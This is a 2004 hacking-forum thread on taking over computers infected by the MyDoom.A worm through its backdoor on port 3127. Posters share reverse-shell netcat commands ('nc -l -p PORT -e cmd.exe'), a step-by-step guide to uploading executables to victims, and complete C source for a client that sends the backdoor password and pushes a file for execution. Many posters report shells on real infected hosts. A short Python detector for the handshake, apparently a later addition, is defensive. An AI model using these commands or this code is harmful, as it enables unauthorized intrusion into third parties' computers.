still don't got no shell. i've got netcat listening and i did what jimmy said, and i've got this:
QUOTE
[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.
but still no shell
ducky
Feb 9 2004, 07:46 PM
try: nc -v -L -p <port> -t
Works for me...just need to wait a minute or so and it sends the shell...
Didn't get admin on any host till now...
Yemoke
Feb 9 2004, 07:49 PM
i get admin on all my hosts (all my hosts are 2)
XtrA
Feb 9 2004, 07:52 PM
I get into the victim, i upload nc.exe and then nc.bat, in which i wrote: nc -v -L -p 1133 -t and all ok:
CODE
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
[+] All done, server have now executed your executable!
but i can't get in through nc like: nc [ip] 1133
why is that?
vnet576
Feb 9 2004, 07:57 PM
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start
These Windows services are started:
SAVScan
Norton AntiVirus Auto Protect Service
Norton Unerase Protection
Symantec Core LC
Symantec Event Manager
Symantec Settings Manager
Yemoke
Feb 9 2004, 08:04 PM
QUOTE (vnet576 @ Feb 9 2004, 07:57 PM)
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start
These Windows services are started:
SAVScan
Norton AntiVirus Auto Protect Service
Norton Unerase Protection
Symantec Core LC
Symantec Event Manager
Symantec Settings Manager
i have hacked a pc with norton already, nothing gets detected if you're good with your files
vnet576
Feb 9 2004, 08:09 PM
QUOTE (Yemoke @ Feb 9 2004, 03:04 PM)
QUOTE (vnet576 @ Feb 9 2004, 07:57 PM)
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start
These Windows services are started:
SAVScan
Norton AntiVirus Auto Protect Service
Norton Unerase Protection
Symantec Core LC
Symantec Event Manager
Symantec Settings Manager
i have hacked a pc with norton already, nothing gets detected if you're good with your files
Ok..you kinda missed the point of my post....what I meant is that people and the media are saying how if everybody had an antivirus installed this worm would've never gotten this widespread. Well, everybody who got infected does have an antivirus installed.
x1`
Feb 9 2004, 08:10 PM
k someone give me instructions exactly what u do, can't get 1 shell. k i've opened crpt.exe, put my ip and the port i want it to bind to and saved it as shell, and then i open mykralor, do mykralor XXX.XXX.XXX.XXX 3127 shell, open nc ip [and the port i chose in crpt]. is this correct?
ThE_snAke
Feb 9 2004, 08:22 PM
10XXXX mannnnn
woot 1.5 = max file size
Yemoke
Feb 9 2004, 08:24 PM
good exploit ssst but i have a 200kb/s one
clip
Feb 9 2004, 08:26 PM
lol.. some of you people are laughable, you don't even understand what a reverse shell is. And Spike.. that was a pretty obvious ripoff of my code.. but whatever, just make it "less" obvious next time
Soulwax
Feb 9 2004, 08:27 PM
Thx a lot for those nice tools, gonna check it out.
Soulwax
yeyo
Feb 9 2004, 08:36 PM
Thanks man, let's try it
DHS
Feb 9 2004, 08:39 PM
great tool dude...
i got 2 shells already but on both i didn't have any admin rights, too bad. Though a friend of mine had one where he did have such rights. So.... anyway.... thx for this tool... works like a charm
GreetZ
vnet576
Feb 9 2004, 08:45 PM
QUOTE (DHS @ Feb 9 2004, 03:39 PM)
great tool dude...
i got 2 shells already but on both i didn't have any admin rights, too bad. Though a friend of mine had one where he did have such rights. So.... anyway.... thx for this tool... works like a charm
GreetZ
How could u not have admin rights? The virus installs itself as a localsystem file. The virus modifies the registry, it uses dll injection to place itself inside explorer.exe...it could not do that unless it had system rights.
ThE_snAke
Feb 9 2004, 08:48 PM
I tried 3 ips , always got this message:
[+] Reading file to send (max length 1599bytes) ...Done
[+] Connecting to infected ip ...Done
[+] Sending file ...Done
[+] Exiting.
it didn't connect to shell
x1`
Feb 9 2004, 08:56 PM
same for me i need someone to write a tut on exactly what to do and what they did for the people that got shells ....thx
Rocky2you
Feb 9 2004, 08:57 PM
I must be the dumbest mf on this board i guess, because i can't figure out the damn exploit. I use the rsCRT.exe and i fill in my ip and netcat port, then i need to save? something....save what and where??
Thanks for helping out
slex
Feb 9 2004, 09:00 PM
^^ works nice for me .. but I can't compile clip's and spikie's file under cygwin .. perhaps someone has passed it .. tnx
Deltax
Feb 9 2004, 09:01 PM
omg noobs the prog works sooo easy..
thnx for the tools btw
Alien
Feb 9 2004, 09:04 PM
QUOTE (Dickybob20 @ Feb 9 2004, 08:56 PM)
same for me i need someone to write a tut on exactly what to do and what they did for the people that got shells ....thx
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe
mykralor.exe IP PORT *.bat
and connect with telnet: telnet IP PORT
Rocky2you
Feb 9 2004, 09:05 PM
ok, me is a noob....but still need help on how to do this. Thanks
MxMx
Feb 9 2004, 09:05 PM
w00w .. 10x ..
really works great ...
noobs .. please .. stop asking .. ''how to do this'' or ''why don't i get a shell''.. before asking .. you should read some basic security articles .. about netcat for instance ..
Rocky2you
Feb 9 2004, 09:08 PM
MxMx...you were born as a know-all??
x1`
Feb 9 2004, 09:09 PM
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe
mykralor.exe IP PORT *.bat
and connect with telnet: telnet IP PORT
how about u upload the bat so i can see and edit the ips
slex
Feb 9 2004, 09:10 PM
QUOTE
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe
mykralor.exe IP PORT *.bat
and connect with telnet: telnet IP PORT
oki but with which exploit do u send nc.exe? I have tested with [Crpt] mykralor v1.0 by kralor [Crpt] and this is the result ...
[+] Reading file to send (max length 1599bytes) ...error: file too long
[+] Exiting.
ThE_snAke
Feb 9 2004, 09:10 PM
10x for the help ALIEN
x1`
Feb 9 2004, 09:20 PM
when i do mykralor.exe ip port nc.exe it says nc is too big, so it's not correct. i am trying with this crpt thing ... i don't understand why i have to type my ip in this and not the target's ip..
still having trouble with connect with netcat
straight after i send the reverse shell code i do
nc -v XXX.xxx.xxx.xxx -l -p 333 -e cmd.exe
and it doesn't work, it just hangs and does nothing
Killa
Feb 9 2004, 09:21 PM
Very nice job you did here
Thanks for this
Greetz Killa
bambipower
Feb 9 2004, 09:21 PM
working famous
nice tool btw
technoboy
Feb 9 2004, 09:25 PM
thanks alot for posting this
Alien
Feb 9 2004, 09:27 PM
sorry i forgot, mykralor only takes 1599 bytes...
run netcat: nc -l -vv -p 99 (it's only an example), then run rsCRT-v1.0, fill in your IP and the PORT netcat runs on (99) and click Create, save this file as shell.exe and upload it: mykralor.exe IP PORT shell.exe. wait a minute and you got a shell!!!
Major Chrome
Feb 9 2004, 09:28 PM
Excellent work on this, seems like this could be a serious exploit if someone is dumb enough to open the attachment.
x1`
Feb 9 2004, 09:34 PM
ok i've got shell at last. my problem: i wasn't waiting long enough. thx a lot for the info
[Ripper]
Feb 9 2004, 09:50 PM
thx a lot for this exploit, will take a deeper look into it
sPiKie
Feb 9 2004, 10:12 PM
Ok, for those retards that didn't read the author of this topic? I wrote down everything you need to know.. Here is a newbie guide...
1. Get NetCat and run it like this: 'nc.exe -l -vv -p 666'. It will now listen for any connection on port 666, meaning that it waits for the cmd.exe to arrive.
2. Use rsCRPT to create the Remote Shell .exe file, that is under 1599 bytes.. What rsCRPT does is create a reverse shellcode that connects to your listening specified port and "arrives with cmd.exe"... So in rsCRPT you do this: Enter your IP, then enter the listening port you got on NetCat, in this example 666.
Note: Many pc's have like "firewalls/portblockers/hackerdefenders" so it can't open the port, but then you should use the port 3128, because 3127 is open and most probably 3128 is also open
3. Now when you have created the reverse shellcode .exe file.. Start mykralor.exe... Usage is like this: mykralor.exe <ip of victim> <port probably 3127> <your .exe shellcode>
4. When you have done this, you will get your shell on "the listening NetCat" if it succeeds..!
Or you can just download my MyDoom.A Upload/Exec source code, it is in this thread... Because in mykralor, my friend kralor wanted to make it like this: promote his new program rsCRPT, so everybody that downloads mykralor.exe will probably download rsCRPT too, to promote it. And his program got file restrictions inside, so you got no choice if you're a scriptie. Hehe.. But down here you can see my program, it can upload any file, even if it's 2000mb.. Yehaw, start spreading warez on Mydoom, the new KAZAA
Here is my source code if you didn't get it or don't have time to go through all the posts in this thread:
CODE
/**************************************/
/* Copyrights 2004 sPiKie tha m4st3r  */
/* Made to a friend                   */
/**************************************/
#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>
#include <winsock.h>

#pragma comment (lib,"ws2_32")   // MSVC only: other toolchains must link ws2_32 themselves

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    struct hostent *he;
    struct sockaddr_in their_addr;                 // connector's address information
    char doompassword[] = "\x85\x13\x3c\x9e\xa2";  // the backdoor uses a password to open CreateProcess();)
    char buf[1024];
    int read = 0;
    FILE *fuckfile;
    WSADATA wsaData;                               // thihihi

    if (argc < 4) {                                // guard: without it a missing argument is a NULL dereference
        printf("Usage: %s <host> <port> <file>\n", argv[0]);
        return -1;
    }

    fuckfile = fopen(argv[3], "rb");
    if (fuckfile == NULL) {
        printf("[-] Open Failed\n");
        return -1;
    }
    printf("[+] File found ready to send\n");

    if (WSAStartup(0x101, &wsaData)) {
        printf("[-] Unable to load winsock.\n");
        return -1;
    }
    if ((he = gethostbyname(argv[1])) == NULL) {   // get the host info
        printf("[-] GetHostByName() Error!\n");
        return -1;
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-] Can't open socket!\n");
        return -1;
    }

    their_addr.sin_family = AF_INET;               // host byte order
    their_addr.sin_port = htons(atoi(argv[2]));    // port
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    //memset(&(their_addr.sin_zero), '\0', 8);     // zero the rest of the struct

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        printf("[-] Connecting error\n");
        return -1;
    }
    printf("[+] Connected\n[+] Sending executable.\n");

    send(sockfd, doompassword, 5, 0);              // sending the password :)
    while (!feof(fuckfile)) {                      // then the file itself, 1024 bytes per send()
        read = fread(buf, sizeof(char), sizeof(buf), fuckfile);
        if ((numbytes = send(sockfd, buf, read, 0)) == -1) {
            printf("[-] Sending executable failed\n");
            return -1;
        }
        printf(".");
    }
    printf("[+] All done, server have now executed your executable!\n");

    fclose(fuckfile);
    closesocket(sockfd);
    WSACleanup();
    return 0;
}
Use this only on your own computers..
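As an added defensive example (not code from this thread, nor from kralor's or sPiKie's tools): the posted client shows that the backdoor protocol is a 5-byte header followed by the executable, sent in separate send() calls. This Python flow tracker, run over constructed payload segments, flags that handshake on the ports the thread names, and handles the header and body arriving in different segments as well as a connection that closes after a bare probe.

```python
"""Detect the MyDoom.A backdoor upload-and-execute handshake discussed in this thread.
Reassembles the first bytes of each flow because header and body arrive in separate segments."""
from collections import defaultdict

BACKDOOR_PORTS = {3127, 3128}                 # the listener ports named in the thread
UPLOAD_EXEC_HEADER = b"\x85\x13\x3c\x9e\xa2"  # 'doompassword' in the posted client
PE_MAGIC = b"MZ"                              # Windows PE files start with the DOS 'MZ' stub
MIN_BYTES = len(UPLOAD_EXEC_HEADER) + len(PE_MAGIC)


def classify(dst_port, data):
    """Verdict for the first bytes of one TCP flow, or None if more bytes are needed."""
    if dst_port not in BACKDOOR_PORTS:
        return "clean"
    if len(data) < MIN_BYTES:
        return None                           # header and body may arrive in separate segments
    if not data.startswith(UPLOAD_EXEC_HEADER):
        return "suspicious: traffic to backdoor port without the handshake"
    if data[len(UPLOAD_EXEC_HEADER):].startswith(PE_MAGIC):
        return "malicious: upload-and-execute handshake followed by a PE file"
    return "malicious: upload-and-execute handshake with a non-PE body"


class FlowTracker:
    """Buffers payload segments per (src, dst_port) until classify() can decide."""
    def __init__(self):
        self.buffers = defaultdict(bytes)
        self.verdicts = {}

    def feed(self, src, dst_port, segment):
        key = (src, dst_port)
        if key not in self.verdicts:
            need = MIN_BYTES - len(self.buffers[key])
            self.buffers[key] += segment[:max(need, 0)]   # only the prefix matters
            verdict = classify(dst_port, self.buffers[key])
            if verdict is not None:
                self.verdicts[key] = verdict
        return self.verdicts.get(key)

    def close(self, src, dst_port):
        """Finalize a flow that ended before MIN_BYTES arrived (a bare probe, e.g. nc with no input)."""
        key = (src, dst_port)
        if key not in self.verdicts:
            short = dst_port in BACKDOOR_PORTS
            self.verdicts[key] = "suspicious: short connection to backdoor port" if short else "clean"
        return self.verdicts[key]
```

The sample flows used in testing are constructed, not captured traffic; on a real sensor the tracker would be fed from a TCP reassembly stage.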
TheOther
Feb 9 2004, 10:17 PM
I think this board needs to filter out some words like: "It doesn't work", "What do I have to do",.......
If you haven't understood this after 6 pages, don't bother the rest.
Alien
Feb 9 2004, 10:20 PM
very nice exploit but i had an error compiling ;/
CODE
doom.obj .text: undefined reference to '_WSAStartup@8'
doom.obj .text: undefined reference to '_gethostbyname@4'
doom.obj .text: undefined reference to '_socket@12'
doom.obj .text: undefined reference to '_htons@4'
doom.obj .text: undefined reference to '_connect@12'
doom.obj .text: undefined reference to '_send@16'
doom.obj .text: undefined reference to '_closesocket@4'
doom.obj .text: undefined reference to '_WSACleanup@0'
boshcash
Feb 9 2004, 10:34 PM
guys don't waste ur time understanding the reverse cmd shell, just get the spikie c code and compile it, it will remove that stupid file limitation, and then upload ur fat R.A. program and play as u like. NOTE: don't compile the first one, move some posts and see another one where u can compile ..
XeRoGrApH
Feb 9 2004, 10:56 PM
1st results comin here and its a pure roll
Wonder how long this exploit will stay up
vnet576
Feb 9 2004, 11:18 PM
QUOTE (Alien @ Feb 9 2004, 05:20 PM)
very nice exploit but i had an error compiling ;/
CODE
doom.obj .text: undefined reference to '_WSAStartup@8'
doom.obj .text: undefined reference to '_gethostbyname@4'
doom.obj .text: undefined reference to '_socket@12'
doom.obj .text: undefined reference to '_htons@4'
doom.obj .text: undefined reference to '_connect@12'
doom.obj .text: undefined reference to '_send@16'
doom.obj .text: undefined reference to '_closesocket@4'
doom.obj .text: undefined reference to '_WSACleanup@0'
that's a winsock problem.. link ws2_32.lib to your project.
phaeton
Feb 9 2004, 11:28 PM
great stuff, works fine here. now gotta start patching some boxes
Major Chrome
Feb 9 2004, 11:39 PM
Compiled yours Spikie,
Sending the file works just fine for me, not sure if it is executing it properly. I place a backdoor on the box with yours, it says it sends and executes, but I'm not so sure it's executing properly.
sPiKie
Feb 9 2004, 11:44 PM
Im sure it is executing properly.. Try it local dude ;P By the way MyDoom.A uses CreateProcess(); to run the "binary"..
Major Chrome
Feb 9 2004, 11:46 PM
QUOTE (sPiKie @ Feb 9 2004, 11:44 PM)
Im sure it is executing properly.. Try it local dude ;P By the way MyDoom.A uses CreateProcess(); to run the "binary"..
Sorry to sound like a complete idiot but how would I go about that, would I not need the virus installed on my computer?
Maybe I made a mistake compiling it
Edit: My apologies, I had the wrong IP. I had an IP for an infected box but I typed it wrong, my mistake, now I sound stupid. It's working perfect now, Thanks!
Alien
Feb 9 2004, 11:51 PM
Thank you vnet576 !! compiled successfully
CRW
Feb 10 2004, 12:03 AM
i have a problem with that exploit, i get:
listening on [any] 666 ...
connect to [MyIP] from ccb06.chir.uniroma1.it [ServerIP] 2643
sent 0, rcvd 0
C:\m>
what's that mean
?
popo0421
Feb 10 2004, 12:18 AM
tested 10 hosts. result is 1 success, 9 fail. Anyway ..... thanks for sharing,